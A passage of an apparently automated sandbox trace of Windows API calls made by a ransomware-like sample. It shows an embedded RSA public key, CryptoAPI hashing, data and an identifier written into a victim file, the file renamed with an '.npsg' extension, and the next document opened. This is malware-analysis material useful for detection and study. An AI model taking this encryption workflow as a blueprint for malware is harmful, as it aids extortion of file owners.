KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.882] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a770) returned 1 [0236.883] CryptCreateHash (in: hProv=0x67a770, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0236.883] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0236.883] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0236.883] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0236.883] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0236.883] GetLastError () returned 0x0 [0236.883] CryptDestroyHash (hHash=0x33f0408) returned 1 [0236.883] CryptReleaseContext (hProv=0x67a770, dwFlags=0x0) returned 1 [0236.884] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0236.884] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0236.884] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0236.884] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0236.884] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0236.884] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0236.884] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0236.884] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x19b0) returned 0x3b81cd0 [0236.884] SetFilePointer (in: hFile=0x644, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0236.884] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0236.884] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7a830 [0236.884] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0236.884] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7aa18 [0236.884] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecb68 [0236.884] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b95980 [0236.884] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400368 [0236.884] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b959c8 [0236.884] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400380 [0236.884] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34003b0 [0236.884] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400410 [0236.884] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34003c8 [0236.884] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x33f8198 [0236.884] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x3b8d7c0 [0236.885] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b8d7c0, Size=0x218) returned 0x3b90810 [0236.885] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x3b83688 [0236.885] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34003b0 | out: hHeap=0x620000) returned 1 [0236.885] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34003c8 | out: hHeap=0x620000) returned 1 [0236.885] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400410 | out: hHeap=0x620000) returned 1 [0236.885] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0236.885] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b83688 | out: hHeap=0x620000) returned 1 [0236.885] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400410 [0236.885] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373588 [0236.885] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34003c8 [0236.885] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c87c0 [0236.885] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x34003b0 [0236.885] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373528 [0236.885] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x3b7ba60 [0236.885] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0236.885] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecbc8 [0236.885] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0236.885] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x3b7bb78 [0236.885] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8780 [0236.885] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0236.885] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ba60 | out: hHeap=0x620000) returned 1 [0236.885] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34003c8 | out: hHeap=0x620000) returned 1 [0236.885] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0236.886] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34003b0 | out: hHeap=0x620000) returned 1 [0236.886] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87c0 | out: hHeap=0x620000) returned 1 [0236.886] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0236.886] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400410 | out: hHeap=0x620000) returned 1 [0236.886] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0236.886] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecb68 | out: hHeap=0x620000) returned 1 [0236.886] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0236.886] GetCurrentThreadId () returned 0x5b4 [0236.886] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33b8188 [0236.886] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x3b797c8 [0236.886] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c19c8 [0236.886] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0236.886] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x33c2ee8 [0236.886] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0236.886] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0236.886] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x6affc0 [0236.886] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0236.886] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0236.886] GetCurrentThreadId () returned 0x5b4 [0236.886] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0236.886] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0236.886] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x340dd38 [0236.886] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0236.886] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0236.887] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0236.887] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0236.887] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0236.887] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x340dd38 [0236.887] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0236.887] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x33c4dd8 [0236.887] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0236.887] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33adda8 [0236.887] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0236.887] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400410 [0236.887] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0236.887] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0236.887] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0236.887] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0236.887] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822e0 [0236.887] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822f0 [0236.887] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8e8 [0236.887] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8f8 [0236.887] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34003b0 [0236.887] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0236.887] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373548 [0236.887] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0236.887] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0236.887] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f908 [0236.888] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f918 [0236.888] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f928 [0236.888] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34003c8 [0236.888] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f918 | out: hHeap=0x620000) returned 1 [0236.888] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c87c0 [0236.888] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f908 | out: hHeap=0x620000) returned 1 [0236.888] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400398 [0236.888] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f928 | out: hHeap=0x620000) returned 1 [0236.888] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400428 [0236.888] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0236.888] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373568 [0236.888] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8e8 | out: hHeap=0x620000) returned 1 [0236.888] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34003f8 [0236.888] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0236.888] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34003e0 [0236.888] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0236.888] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400440 [0236.888] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34003e0 | out: hHeap=0x620000) returned 1 [0236.888] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34003e0 [0236.888] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34003f8 | out: hHeap=0x620000) returned 1 [0236.888] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373598 [0236.888] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0236.888] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8800 [0236.888] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0236.889] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x33fd4c8 [0236.889] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34003b0 | out: hHeap=0x620000) returned 1 [0236.889] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34003b0 [0236.889] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0236.889] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x3b90810 [0236.889] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400410 | out: hHeap=0x620000) returned 1 [0236.889] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7ba60 [0236.889] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400440 | out: hHeap=0x620000) returned 1 [0236.889] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x346fd28 [0236.889] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0236.889] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x3b7b830 [0236.889] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822e0 | out: hHeap=0x620000) returned 1 [0236.889] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7b948 [0236.889] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34003b0 | out: hHeap=0x620000) returned 1 [0236.889] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x3b947f8 [0236.889] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ba60 | out: hHeap=0x620000) returned 1 [0236.889] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x64dd08 [0236.889] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0236.889] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0236.890] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0236.890] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64dd08 | out: hHeap=0x620000) returned 1 [0236.890] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8800 | out: hHeap=0x620000) returned 1 [0236.890] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b948 | out: hHeap=0x620000) returned 1 [0236.890] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fd28 | out: hHeap=0x620000) returned 1 [0236.890] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b947f8 | out: hHeap=0x620000) returned 1 [0236.890] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b830 | out: hHeap=0x620000) returned 1 [0236.890] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822f0 | out: hHeap=0x620000) returned 1 [0236.890] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34003e0 | out: hHeap=0x620000) returned 1 [0236.890] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8f8 | out: hHeap=0x620000) returned 1 [0236.890] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400428 | out: hHeap=0x620000) returned 1 [0236.890] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87c0 | out: hHeap=0x620000) returned 1 [0236.890] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34003c8 | out: hHeap=0x620000) returned 1 [0236.890] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400398 | out: hHeap=0x620000) returned 1 [0236.890] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0236.890] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c19c8 | out: hHeap=0x620000) returned 1 [0236.890] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0236.890] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400380 | out: hHeap=0x620000) returned 1 [0236.890] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b959c8 | out: hHeap=0x620000) returned 1 [0236.890] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0236.890] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33adda8 | out: hHeap=0x620000) returned 1 [0236.890] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4dd8 | out: hHeap=0x620000) returned 1 [0236.890] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bb78 | out: hHeap=0x620000) returned 1 [0236.890] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87a0 | out: hHeap=0x620000) returned 1 [0236.890] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0236.890] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0236.890] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecbc8 | out: hHeap=0x620000) returned 1 [0236.890] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7aa18 | out: hHeap=0x620000) returned 1 [0236.890] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0236.890] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0236.891] WriteFile (in: hFile=0x644, lpBuffer=0x3b81cd0*, nNumberOfBytesToWrite=0x19ab, lpNumberOfBytesWritten=0x39afb14, lpOverlapped=0x0 | out: lpBuffer=0x3b81cd0*, lpNumberOfBytesWritten=0x39afb14*=0x19ab, lpOverlapped=0x0) returned 1 [0236.891] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b81cd0 | out: hHeap=0x620000) returned 1 [0236.891] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x19b0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.891] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0236.891] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0236.891] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.891] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x3b947f8 [0236.891] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", cchWideChar=-1, lpMultiByteStr=0x3b947f8, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", lpUsedDefaultChar=0x0) returned 41 [0236.891] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x3b81cd0 [0236.891] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b947f8 | out: hHeap=0x620000) returned 1 [0236.891] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d120 | out: hHeap=0x620000) returned 1 [0236.891] WriteFile (in: hFile=0x644, lpBuffer=0x3b81cd0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x3b81cd0*, lpNumberOfBytesWritten=0x39afb50*=0x28, lpOverlapped=0x0) returned 1 [0236.891] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b81cd0 | out: hHeap=0x620000) returned 1 [0236.891] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0236.891] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0236.891] CloseHandle (hObject=0x644) returned 1 [0236.892] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c45a0 [0236.892] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x870) returned 0x3b81cd0 [0236.892] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c45a0 | out: hHeap=0x620000) returned 1 [0236.892] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\wEdi.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\wedi.xlsx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\wEdi.xlsx.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\wedi.xlsx.npsg")) returned 1 [0236.893] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b81cd0 | out: hHeap=0x620000) returned 1 [0236.893] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0236.893] VirtualFree (lpAddress=0x39f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0236.894] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e690 | out: hHeap=0x620000) returned 1 [0236.894] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf1ce4850, ftCreationTime.dwHighDateTime=0x1d57faf, ftLastAccessTime.dwLowDateTime=0xcfd930, ftLastAccessTime.dwHighDateTime=0x1d564fe, ftLastWriteTime.dwLowDateTime=0xcfd930, ftLastWriteTime.dwHighDateTime=0x1d564fe, nFileSizeHigh=0x0, nFileSizeLow=0xd93b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Xp74G9c0b92CjC.docx", cAlternateFileName="XP74G9~1.DOC")) returned 1 [0236.894] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.894] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8e) returned 0x64e690 [0236.894] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d120 | out: hHeap=0x620000) returned 1 [0236.894] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Xp74G9c0b92CjC.docx") returned=".docx" [0236.895] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Xp74G9c0b92CjC.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xp74g9c0b92cjc.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0236.897] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=55611) returned 1 [0236.897] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0236.899] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xd915, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.899] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0236.900] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0236.900] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0236.901] SetFilePointer (in: hFile=0x644, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0236.901] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0xd93b, lpOverlapped=0x0) returned 1 [0236.901] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END 